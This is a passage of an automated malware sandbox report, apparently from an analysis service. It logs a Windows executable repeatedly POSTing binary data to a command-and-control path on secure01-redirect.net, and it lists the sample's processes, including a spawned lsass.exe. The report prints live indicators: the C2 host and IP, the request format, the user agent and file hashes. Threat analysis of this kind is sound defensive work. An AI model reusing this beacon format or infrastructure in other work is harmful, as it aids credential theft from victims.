                                                            Dec 1, 2021 20:21:21.810395002 CET443OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:22.632446051 CET443INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:22 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            69192.168.11.204989085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:23.077689886 CET444OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:23.952399015 CET445INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:23 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.11.204982285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:53.801918983 CET212OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:54.719422102 CET213INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:54 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            70192.168.11.204989185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:24.396486998 CET445OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:25.306318045 CET446INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:24 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            71192.168.11.204989285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:25.745523930 CET447OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:26.626657963 CET447INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:25 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            72192.168.11.204989385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:27.062975883 CET448OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:31.075531006 CET448INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:30 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            73192.168.11.204989485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:31.501887083 CET449OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:32.361392975 CET450INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:31 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            74192.168.11.204989585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:21:32.784380913 CET450OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:21:33.638575077 CET451INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:22:33 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            75192.168.11.204989685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            76192.168.11.204989785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            77192.168.11.204989885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            78192.168.11.204989985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            79192.168.11.204990085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.11.204982385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:55.345262051 CET213OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:57.639204025 CET214INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:56 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            80192.168.11.204990185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            81192.168.11.204990285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            82192.168.11.204990385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            83192.168.11.204990485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            84192.168.11.204990585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            85192.168.11.204990685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            86192.168.11.204990785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            87192.168.11.204990885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            88192.168.11.204990985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            89192.168.11.204991085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9192.168.11.204982485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:58.233081102 CET215OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:59.069328070 CET215INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:58 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            90192.168.11.204991185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            91192.168.11.204991385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            92192.168.11.204991485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            93192.168.11.204991585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            94192.168.11.204991685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            95192.168.11.204991785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            96192.168.11.204991885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            97192.168.11.204991985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            98192.168.11.204992085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            99192.168.11.204992185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: QVWb1n5OTH.exe PID: 4848 Parent PID: 5416

                                                            General

                                                            Start time:20:18:24
                                                            Start date:01/12/2021
                                                            Path:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\QVWb1n5OTH.exe"
                                                            Imagebase:0x400000
                                                            File size:152872 bytes
                                                            MD5 hash:F8236209C7B1928B3F1EB0A7074F6992
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Visual Basic
                                                            Reputation:low

                                                            Analysis Process: QVWb1n5OTH.exe PID: 7056 Parent PID: 4848

                                                            General

                                                            Start time:20:19:01
                                                            Start date:01/12/2021
                                                            Path:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\QVWb1n5OTH.exe"
                                                            Imagebase:0x400000
                                                            File size:152872 bytes
                                                            MD5 hash:F8236209C7B1928B3F1EB0A7074F6992
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            Analysis Process: lsass.exe PID: 1012 Parent PID: 7056

                                                            General

                                                            Start time:20:19:41
                                                            Start date:01/12/2021
                                                            Path:C:\Windows\System32\lsass.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\lsass.exe
                                                            Imagebase:0x7ff613400000
                                                            File size:59448 bytes
                                                            MD5 hash:15A556DEF233F112D127025AB51AC2D3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >